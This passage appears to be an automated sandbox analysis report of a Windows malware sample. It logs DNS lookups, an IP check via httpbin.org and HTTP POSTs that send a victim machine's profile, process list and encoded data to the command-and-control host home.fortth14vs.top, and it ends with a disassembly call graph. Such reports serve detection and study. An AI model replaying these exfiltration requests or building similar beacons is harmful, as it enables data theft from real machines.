                                Dec 31, 2024 09:44:14.117522001 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.117531061 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.117539883 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.117548943 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.117556095 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.117577076 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.117585897 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.117600918 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.117609978 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.117618084 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.117729902 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.117825031 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.117844105 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.117852926 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.117861986 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.117871046 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.117878914 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.117887974 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.117897987 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.117907047 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.117923021 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.117932081 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.117943048 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:16.825931072 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:16.826073885 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:16.826117992 CET4970580192.168.2.791.149.241.220
                                Dec 31, 2024 09:44:16.826389074 CET4970580192.168.2.791.149.241.220
                                Dec 31, 2024 09:44:16.831228971 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:16.935791016 CET4970753192.168.2.71.1.1.1
                                Dec 31, 2024 09:44:16.940773010 CET53497071.1.1.1192.168.2.7
                                Dec 31, 2024 09:44:16.940844059 CET4970753192.168.2.71.1.1.1
                                Dec 31, 2024 09:44:16.941081047 CET4970753192.168.2.71.1.1.1
                                Dec 31, 2024 09:44:16.945867062 CET53497071.1.1.1192.168.2.7
                                Dec 31, 2024 09:44:17.595194101 CET53497071.1.1.1192.168.2.7
                                Dec 31, 2024 09:44:17.595626116 CET4970753192.168.2.71.1.1.1
                                Dec 31, 2024 09:44:17.600532055 CET53497071.1.1.1192.168.2.7
                                Dec 31, 2024 09:44:17.600606918 CET4970753192.168.2.71.1.1.1
                                Dec 31, 2024 09:44:17.723851919 CET4971380192.168.2.791.149.241.220
                                Dec 31, 2024 09:44:17.728709936 CET804971391.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:17.728794098 CET4971380192.168.2.791.149.241.220
                                Dec 31, 2024 09:44:17.729161978 CET4971380192.168.2.791.149.241.220
                                Dec 31, 2024 09:44:17.739372969 CET804971391.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:18.480685949 CET804971391.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:18.480726004 CET804971391.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:18.480806112 CET4971380192.168.2.791.149.241.220
                                Dec 31, 2024 09:44:18.481225014 CET4971380192.168.2.791.149.241.220
                                Dec 31, 2024 09:44:18.486129045 CET804971391.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:19.647449970 CET4972880192.168.2.791.149.241.220
                                Dec 31, 2024 09:44:19.652304888 CET804972891.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:19.652384996 CET4972880192.168.2.791.149.241.220
                                Dec 31, 2024 09:44:19.652730942 CET4972880192.168.2.791.149.241.220
                                Dec 31, 2024 09:44:19.657556057 CET804972891.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:20.520076990 CET804972891.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:20.520092010 CET804972891.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:20.520255089 CET4972880192.168.2.791.149.241.220
                                Dec 31, 2024 09:44:20.520853043 CET4972880192.168.2.791.149.241.220
                                Dec 31, 2024 09:44:20.526086092 CET804972891.149.241.220192.168.2.7

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Dec 31, 2024 09:44:09.784519911 CET6220253192.168.2.71.1.1.1
                                Dec 31, 2024 09:44:09.784682035 CET6220253192.168.2.71.1.1.1
                                Dec 31, 2024 09:44:09.791661024 CET53622021.1.1.1192.168.2.7
                                Dec 31, 2024 09:44:09.791676044 CET53622021.1.1.1192.168.2.7
                                Dec 31, 2024 09:44:12.638474941 CET6257953192.168.2.71.1.1.1
                                Dec 31, 2024 09:44:12.638550997 CET6257953192.168.2.71.1.1.1
                                Dec 31, 2024 09:44:13.408540010 CET53625791.1.1.1192.168.2.7
                                Dec 31, 2024 09:44:13.542042017 CET53625791.1.1.1192.168.2.7
                                Dec 31, 2024 09:44:16.928581953 CET5898953192.168.2.71.1.1.1
                                Dec 31, 2024 09:44:16.928652048 CET5898953192.168.2.71.1.1.1
                                Dec 31, 2024 09:44:16.935342073 CET53589891.1.1.1192.168.2.7
                                Dec 31, 2024 09:44:17.722835064 CET53589891.1.1.1192.168.2.7
                                Dec 31, 2024 09:44:18.553672075 CET5899153192.168.2.71.1.1.1
                                Dec 31, 2024 09:44:18.553725004 CET5899153192.168.2.71.1.1.1
                                Dec 31, 2024 09:44:19.036235094 CET53589911.1.1.1192.168.2.7
                                Dec 31, 2024 09:44:19.646541119 CET53589911.1.1.1192.168.2.7

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Dec 31, 2024 09:44:09.784519911 CET192.168.2.71.1.1.10xca54Standard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                Dec 31, 2024 09:44:09.784682035 CET192.168.2.71.1.1.10xc6dfStandard query (0)httpbin.org28IN (0x0001)false
                                Dec 31, 2024 09:44:12.638474941 CET192.168.2.71.1.1.10x89c9Standard query (0)home.fortth14vs.topA (IP address)IN (0x0001)false
                                Dec 31, 2024 09:44:12.638550997 CET192.168.2.71.1.1.10xe944Standard query (0)home.fortth14vs.top28IN (0x0001)false
                                Dec 31, 2024 09:44:16.928581953 CET192.168.2.71.1.1.10x9790Standard query (0)home.fortth14vs.topA (IP address)IN (0x0001)false
                                Dec 31, 2024 09:44:16.928652048 CET192.168.2.71.1.1.10xab95Standard query (0)home.fortth14vs.top28IN (0x0001)false
                                Dec 31, 2024 09:44:16.941081047 CET192.168.2.71.1.1.10xab95Standard query (0)home.fortth14vs.top28IN (0x0001)false
                                Dec 31, 2024 09:44:18.553672075 CET192.168.2.71.1.1.10xdc4dStandard query (0)home.fortth14vs.topA (IP address)IN (0x0001)false
                                Dec 31, 2024 09:44:18.553725004 CET192.168.2.71.1.1.10xc146Standard query (0)home.fortth14vs.top28IN (0x0001)false

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Dec 31, 2024 09:44:09.791661024 CET1.1.1.1192.168.2.70xca54No error (0)httpbin.org34.197.122.172A (IP address)IN (0x0001)false
                                Dec 31, 2024 09:44:09.791661024 CET1.1.1.1192.168.2.70xca54No error (0)httpbin.org34.200.57.114A (IP address)IN (0x0001)false
                                Dec 31, 2024 09:44:13.542042017 CET1.1.1.1192.168.2.70x89c9No error (0)home.fortth14vs.top91.149.241.220A (IP address)IN (0x0001)false
                                Dec 31, 2024 09:44:17.722835064 CET1.1.1.1192.168.2.70x9790No error (0)home.fortth14vs.top91.149.241.220A (IP address)IN (0x0001)false
                                Dec 31, 2024 09:44:19.036235094 CET1.1.1.1192.168.2.70xdc4dNo error (0)home.fortth14vs.top91.149.241.220A (IP address)IN (0x0001)false

                                HTTP Request Dependency Graph

                                • httpbin.org
                                • home.fortth14vs.top

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.74970591.149.241.220806040C:\Users\user\Desktop\ZN34wF8WI2.exe
                                TimestampBytes transferredDirectionData
                                Dec 31, 2024 09:44:13.549916983 CET12360OUTPOST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1
                                Host: home.fortth14vs.top
                                Accept: */*
                                Content-Type: application/json
                                Content-Length: 560612
                                Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 39 38 32 31 37 36 35 32 39 31 34 33 33 35 34 34 39 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                                Data Ascii: { "ip": "8.46.123.189", "current_time": "8598217652914335449", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 50, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 556 }, { "name": "services.exe", "pid": 624 }, { "name": "lsass.exe", "pid": 632 }, { "name": "svchost.exe", "pid": 748 }, { "name": "fontdrvhost.exe", "pid": 772 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "svchost.exe", "pid": 864 }, { "name": "svchost.exe", "pid": 912 }, { "name": "dwm.exe", "pid": 976 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 704 }, { "name": "svchost.exe", "pid": 860 }, { "name": "svchost.exe" [TRUNCATED]
                                Dec 31, 2024 09:44:13.555141926 CET7416OUTData Raw: 31 39 66 66 44 43 77 2b 48 5c 2f 78 31 2b 49 66 77 35 38 4d 47 37 6e 76 62 6d 5c 2f 31 4c 56 50 44 56 31 6f 6e 68 72 53 6f 6e 38 51 33 74 33 63 58 64 72 71 72 79 51 36 31 4a 5c 2f 70 56 70 66 58 6e 35 71 56 5c 2f 55 50 68 52 34 75 63 4a 2b 4c 33
                                Data Ascii: 19ffDCw+H\/x1+Ifw58MG7nvbm\/1LVPDV1onhrSon8Q3t3cXdrqryQ61J\/pVpfXn5qV\/UPhR4ucJ+L3D\/wDbfDdedHE4aUKOcZJjJU45nk+KnFyhDEU4SlGrhsQozlgsdRvh8VGFSKdPE0MTh6H8feMvghxr4G8Tvh\/ivD06+ExkJ4jIuIcDGrLKM9wlOSjOphatSMZUcXhnOEMfl1dRxODnOlNqrhcRhMVia9FWKg2P7f
                                Dec 31, 2024 09:44:13.555217981 CET17304OUTData Raw: 6a 55 6c 49 77 4c 66 6e 6d 76 39 37 44 5c 2f 6d 6c 49 4b 4b 6c 32 44 33 5c 2f 77 41 5c 2f 68 52 73 48 76 5c 2f 6e 38 4b 41 4f 4a 38 63 65 4c 6c 38 47 61 52 44 71 6a 57 44 61 69 5a 37 2b 47 77 53 33 46 79 4c 51 42 70 59 4c 6d 34 4d 6a 54 47 43 35
                                Data Ascii: jUlIwLfnmv97D\/mlIKKl2D3\/wA\/hRsHv\/n8KAOJ8ceLl8GaRDqjWDaiZ7+GwS3FyLQBpYLm4MjTGC5wqpasNoiYszKMqMkfeP7En\/BaT\/hjj4U+IPhj\/wAM2f8ACxv7d+IWq+O\/7b\/4XF\/wiH2X+0\/DnhPw\/wD2V\/Zv\/Cq\/FHn+R\/wi\/wBr+3fb4fN+3fZ\/scf2bzrj83PjooHhLTiM\/wDIx2n\/AKbN
                                Dec 31, 2024 09:44:13.560146093 CET4944OUTData Raw: 50 5c 2f 41 4e 63 65 76 36 6f 66 4c 38 7a 2b 5c 2f 77 44 39 73 76 38 41 55 38 66 35 5c 2f 4d 30 39 66 39 79 54 33 38 7a 39 78 5c 2f 6e 67 2b 33 4e 48 79 79 4e 4d 37 70 76 66 7a 66 33 58 2b 65 33 2b 65 42 57 5a 30 44 50 4c 64 66 4f 5c 2f 76 78 5c
                                Data Ascii: P\/ANcev6ofL8z+\/wD9sv8AU8f5\/M09f9yT38z9x\/ng+3NHyyNM7pvfzf3X+e3+eBWZ0DPLdfO\/vx\/9Mv1\/rRI0yyJD\/B\/z8f1wKEj3b9jl\/wDtr7frnNN2\/MjpDgf6qXzP8\/lWntPL8f8AgAQx\/vJPL2RzJH9ol80\/uPO7\/wCOafJn93v+5\/n\/AEW7qXcn3Ngx5v8Ay7xeR\/nNQxyPj+4kf+q\/fXX\/A
                                Dec 31, 2024 09:44:13.560184002 CET7416OUTData Raw: 48 78 44 38 54 74 48 52 6f 37 64 4c 69 2b 6c 73 45 6b 34 39 51 38 5a 65 45 39 4a 38 49 5c 2f 45 44 34 67 66 43 69 30 2b 4e 48 77 4b 38 64 66 45 33 34 56 61 52 38 57 74 56 2b 49 66 67 58 77 54 65 66 48 74 74 61 38 4f 53 66 42 54 77 68 71 66 6a 6e
                                Data Ascii: HxD8TtHRo7dLi+lsEk49Q8ZeE9J8I\/ED4gfCi0+NHwK8dfE34VaR8WtV+IfgXwTefHtta8OSfBTwhqfjnx3pC3\/jL9nfwZ4T1vVrTw\/omt3NmugeJtT065bSbwSalbxm1lufw6Pg79ESp71PiPNKtK2cyWIo5tnNXCSpcPTpUs9xMcXTyuWFlg8oq1qNLMcbGs8JhKtSFOtWhOSif0rW8dfp2YarLD4rhTJ8LioYjLsHUwOK
                                Dec 31, 2024 09:44:13.560219049 CET2472OUTData Raw: 66 78 58 48 5c 2f 50 33 31 5c 2f 77 41 50 63 31 44 35 68 6a 6a 52 39 6e 48 6c 66 36 76 38 7a 2b 66 2b 65 6e 46 57 6d 6a 2b 35 38 38 61 66 75 76 4b 37 2b 76 38 41 78 39 66 39 66 76 72 6e 30 34 70 4a 4e 6e 6d 62 32 2b 52 50 2b 65 63 66 2b 66 30 2b
                                Data Ascii: fxXH\/P31\/wAPc1D5hjjR9nHlf6v8z+f+enFWmj+588afuvK7+v8Ax9f9fvrn04pJNnmb2+RP+ecf+f0+tB0U6m+n9d1\/XbUp\/wDLREV5H7f9MP58YoaP76BP+mX7uX9xU3l\/NM\/kl\/L+vkfz5pny8fIJv3Xmyx+b+fX60F878v6+Yzckaun338r91HH+v9KrbZEXfs+f\/pn+4\/z27nFTSbJG8n+Mxf5\/yelDMn7l9
                                Dec 31, 2024 09:44:13.603216887 CET34608OUTData Raw: 61 61 78 38 50 38 41 78 70 38 45 50 46 66 67 2b 58 39 6f 4c 34 75 33 65 69 65 45 5c 2f 68 72 72 50 77 4f 2b 4c 52 38 63 65 4c 66 44 5c 2f 69 37 34 36 57 76 6a 6d 33 38 64 58 5c 2f 78 65 31 36 44 78 7a 62 36 44 71 6e 68 4b 33 38 52 61 47 75 6c 72
                                Data Ascii: aax8P8Axp8EPFfg+X9oL4u3eieE\/hrrPwO+LR8ceLfD\/i746Wvjm38dX\/xe16Dxzb6DqnhK38RaGulra+A37Ss97+xv4d+A3wp1\/wCAvw6SLS\/2ntB+OXwy+NFl+3xoXxD+KvjDxp8XvGnjrwF8XvhbZfBfxDe\/saeP9YvvAGveAdB8K63+1D4E0T4i\/CvxZ8O4LG11iTwjp\/g250j12fw74fupGmudC0e4mb70s+mW
                                Dec 31, 2024 09:44:13.651026011 CET1236OUTData Raw: 5c 2f 6e 36 5c 2f 53 74 44 51 5a 48 4a 39 78 4e 6d 78 50 2b 57 76 30 35 7a 6b 65 74 4d 58 5a 38 79 62 4a 48 53 54 39 37 2b 37 6c 5c 2f 63 66 6a 5c 2f 38 41 71 5c 2f 72 54 5c 2f 4a 78 49 6e 6e 4a 73 54 5c 2f 57 39 66 33 5c 2f 5c 2f 41 46 37 65 32
                                Data Ascii: \/n6\/StDQZHJ9xNmxP+Wv05zketMXZ8ybJHST97+7l\/cfj\/8Aq\/rT\/JxInnJsT\/W9f3\/\/AF7e2en8qf5e3Yjp8nlfupJP9RB1\/n+tB0Fba7K6fvEST96I7fv259f6+nrCwf8Aj+RP9VEI\/Tr+J\/yKteTx8n3PK8r7Pn\/R5un+f\/rcVB8nl\/O+x\/8AW9fP\/X0xx+HNBt7\/APd\/Eh\/uO77H\/wCWWO\/v\
                                Dec 31, 2024 09:44:13.700309992 CET1236OUTData Raw: 6e 78 5c 2f 48 6a 31 46 50 6b 2b 56 6e 54 66 76 78 2b 39 38 76 38 41 7a 6e 70 31 5c 2f 77 41 6a 4e 61 53 54 48 79 49 35 66 39 31 2b 39 66 38 41 31 5c 2f 4e 35 5c 2f 77 41 76 58 31 5c 2f 55 63 66 69 41 43 37 39 7a 34 38 76 5c 2f 41 46 76 6c 66 36
                                Data Ascii: nx\/Hj1FPk+VnTfvx+98v8Aznp1\/wAjNaSTHyI5f91+9f8A1\/N5\/wAvX1\/UcfiAC79z48v\/AFvlf6R\/zw\/z\/ifdn+r37E2Px+883+f+cj8qs\/K0ifPsST97L\/X36\/5OarCMsm\/ZvQ\/5\/wA\/05oAX5I5N+ze8Z\/e+X\/r4eM\/zqP5Y2fyU8n\/AJZeZ5vnz\/h9fy\/Kptv7t3TzHT\/VS5x++\/z\/AJ91
                                Dec 31, 2024 09:44:13.747025967 CET1236OUTData Raw: 2b 43 6e 37 45 66 37 4a 76 78 6c 75 66 46 46 33 72 33 78 6f 30 37 34 37 5c 2f 73 44 51 66 74 56 5c 2f 44 33 34 77 58 47 75 61 67 5a 39 59 38 52 2b 46 5c 2f 69 56 38 4f 64 4f 50 78 59 38 4b 36 5c 2f 4e 44 39 6f 76 74 51 30 62 57 76 44 49 73 72 76
                                Data Ascii: +Cn7Ef7JvxlufFF3r3xo0747\/sDQftV\/D34wXGuagZ9Y8R+F\/iV8OdOPxY8K6\/ND9ovtQ0bWvDIsrvWJ4Z4vEzTXGrajN\/LuzM7M7szOzFmZiWZmY5ZmY5JYkkkk5J5NNrwMV4j55isZicRPD5W8JXqe0jlzwFKFKlyQpUcO\/reEWEzGdShh6FDDxqPFpTo01RnB0X7I+2yX6J3hzk2QZRllDM+MlneWYNYWrxVHiTG4n
                                Dec 31, 2024 09:44:13.795793056 CET1236OUTData Raw: 72 32 7a 75 6a 48 6c 50 69 35 5a 65 49 4c 48 39 67 6a 34 31 4a 34 72 30 79 5c 2f 30 54 78 4e 4c 38 42 39 4a 66 78 44 6f 65 72 50 62 53 61 76 6f 6d 75 51 5c 2f 42 48 77 48 59 36 78 70 4f 72 53 57 58 69 33 78 39 5a 53 61 6c 59 61 6e 61 58 64 74 65
                                Data Ascii: r2zujHlPi5ZeILH9gj41J4r0y\/0TxNL8B9JfxDoerPbSavomuQ\/BHwHY6xpOrSWXi3x9ZSalYanaXdtevZ+O\/G1q06OYPF3iOMrrF57H8CfBviX4XfsrfBb4feMYI7Txd4D+G3wa8IeJ7aC8h1CGDX\/D2i+DtH1eGK\/tnkt72NL61uFS6hkeK4UCVGZXBOT+18c\/ss\/tTn1+H3iA\/n4D0Gv3bIPZUvFTKPquJp4rD1P
                                Dec 31, 2024 09:44:16.825931072 CET157INHTTP/1.1 200 OK
                                Server: nginx/1.22.1
                                Date: Tue, 31 Dec 2024 08:44:16 GMT
                                Content-Type: text/html; charset=utf-8
                                Content-Length: 1
                                Connection: close
                                Data Raw: 30
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.74971391.149.241.220806040C:\Users\user\Desktop\ZN34wF8WI2.exe
                                TimestampBytes transferredDirectionData
                                Dec 31, 2024 09:44:17.729161978 CET99OUTGET /gduZhxVRrNSTmMahdBGb1735537738?argument=0 HTTP/1.1
                                Host: home.fortth14vs.top
                                Accept: */*
                                Dec 31, 2024 09:44:18.480685949 CET372INHTTP/1.1 404 NOT FOUND
                                Server: nginx/1.22.1
                                Date: Tue, 31 Dec 2024 08:44:18 GMT
                                Content-Type: text/html; charset=utf-8
                                Content-Length: 207
                                Connection: close
                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                2192.168.2.74972891.149.241.220806040C:\Users\user\Desktop\ZN34wF8WI2.exe
                                TimestampBytes transferredDirectionData
                                Dec 31, 2024 09:44:19.652730942 CET172OUTPOST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1
                                Host: home.fortth14vs.top
                                Accept: */*
                                Content-Type: application/json
                                Content-Length: 31
                                Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                Data Ascii: { "id1": "0", "data": "Done1" }
                                Dec 31, 2024 09:44:20.520076990 CET372INHTTP/1.1 404 NOT FOUND
                                Server: nginx/1.22.1
                                Date: Tue, 31 Dec 2024 08:44:20 GMT
                                Content-Type: text/html; charset=utf-8
                                Content-Length: 207
                                Connection: close
                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                HTTPS Proxied Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.74970434.197.122.1724436040C:\Users\user\Desktop\ZN34wF8WI2.exe
                                TimestampBytes transferredDirectionData
                                2024-12-31 08:44:10 UTC52OUTGET /ip HTTP/1.1
                                Host: httpbin.org
                                Accept: */*
                                2024-12-31 08:44:10 UTC224INHTTP/1.1 200 OK
                                Date: Tue, 31 Dec 2024 08:44:10 GMT
                                Content-Type: application/json
                                Content-Length: 31
                                Connection: close
                                Server: gunicorn/19.9.0
                                Access-Control-Allow-Origin: *
                                Access-Control-Allow-Credentials: true
                                2024-12-31 08:44:10 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                Data Ascii: { "origin": "8.46.123.189"}


                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                System Behavior

                                General

                                Target ID:5
                                Start time:03:44:07
                                Start date:31/12/2024
                                Path:C:\Users\user\Desktop\ZN34wF8WI2.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\ZN34wF8WI2.exe"
                                Imagebase:0x410000
                                File size:4'464'640 bytes
                                MD5 hash:E08249E8FC2ED51351908219F021FB0E
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true

                                Disassembly

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:2.6%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:14.6%
                                  Total number of Nodes:569
                                  Total number of Limit Nodes:92
                                  execution_graph 72243 42d5e0 72244 42d652 WSAStartup 72243->72244 72245 42d5f0 72243->72245 72244->72245 72246 42d664 72244->72246 72248 42d67c 72245->72248 72250 42d690 _open 72245->72250 72249 42d5fa 72250->72249 71835 44b400 71836 44b425 71835->71836 71837 44b40b 71835->71837 71840 417770 71837->71840 71838 44b421 71841 417790 71840->71841 71842 4177b6 recv 71840->71842 71841->71842 71843 417799 71841->71843 71844 4177a3 71842->71844 71847 4177d4 71842->71847 71843->71844 71845 4177db 71843->71845 71851 4172a0 _open 71844->71851 71852 4172a0 _open 71845->71852 71847->71838 71849 4177ec 71853 41cb20 _open 71849->71853 71851->71847 71852->71849 71853->71847 71854 44e400 71855 44e412 71854->71855 71859 44e459 71854->71859 71856 44e422 71855->71856 71878 463030 _open 71855->71878 71879 4709d0 _open 71856->71879 71861 44e4a8 71859->71861 71863 44e495 71859->71863 71866 44b5a0 71859->71866 71860 44e42b 71880 4468b0 closesocket _open 71860->71880 71863->71861 71865 44b5a0 _open 71863->71865 71865->71861 71867 44b5d2 71866->71867 71868 44b5c0 71866->71868 71867->71863 71868->71867 71869 44b713 71868->71869 71874 44b626 71868->71874 71882 454f40 _open 71869->71882 71871 44b65a 71871->71867 71872 44b72b 71871->71872 71873 44b737 71871->71873 71872->71867 71883 4550a0 _open 71872->71883 71873->71867 71884 4550a0 _open 71873->71884 71874->71867 71874->71871 71874->71872 71874->71873 71881 4550a0 _open 71874->71881 71878->71856 71879->71860 71880->71859 71881->71874 71882->71867 71883->71867 71884->71867 71885 44f100 71887 44f11f 71885->71887 71911 44f1b8 71885->71911 71886 44ff1a 71928 450c80 _open 71886->71928 71889 44f2a3 71887->71889 71902 44f240 71887->71902 71906 44f603 71887->71906 71887->71911 71920 454f40 _open 71889->71920 71891 450045 71894 45010d 71891->71894 71898 45004d 71891->71898 71891->71911 71931 4550a0 _open 71891->71931 71892 44f80d 71896 45015e 71894->71896 71932 4550a0 _open 71894->71932 71895 45008a 71930 454f40 _open 71895->71930 71896->71898 71933 4550a0 _open 71896->71933 71934 454f40 _open 71898->71934 71902->71911 71921 417310 _open 71902->71921 71905 44f491 71905->71906 71923 417310 _open 71905->71923 71906->71886 71906->71891 71906->71892 71906->71895 71914 450d30 _open 71906->71914 71917 4550a0 _open 71906->71917 71926 41fa50 _open 71906->71926 71927 454fd0 _open 71906->71927 71907 44ff5b 71907->71911 71929 4550a0 _open 71907->71929 71912 44f3ce 71912->71905 71912->71911 71922 4550a0 _open 71912->71922 71914->71906 71915 44f5b9 71925 41fa50 _open 71915->71925 71917->71906 71918 44f50d 71918->71911 71918->71915 71924 4550a0 _open 71918->71924 71920->71911 71921->71912 71922->71905 71923->71918 71924->71915 71925->71906 71926->71906 71927->71906 71928->71907 71929->71911 71930->71911 71931->71894 71932->71896 71933->71898 71934->71911 71935 44b3c0 71936 44b3ee 71935->71936 71937 44b3cb 71935->71937 71941 4176a0 71937->71941 71952 449290 71937->71952 71938 44b3ea 71942 4176c0 71941->71942 71943 4176e6 send 71941->71943 71942->71943 71944 4176c9 71942->71944 71945 4176d3 71943->71945 71951 417704 71943->71951 71944->71945 71946 41770b 71944->71946 71966 4172a0 _open 71945->71966 71967 4172a0 _open 71946->71967 71949 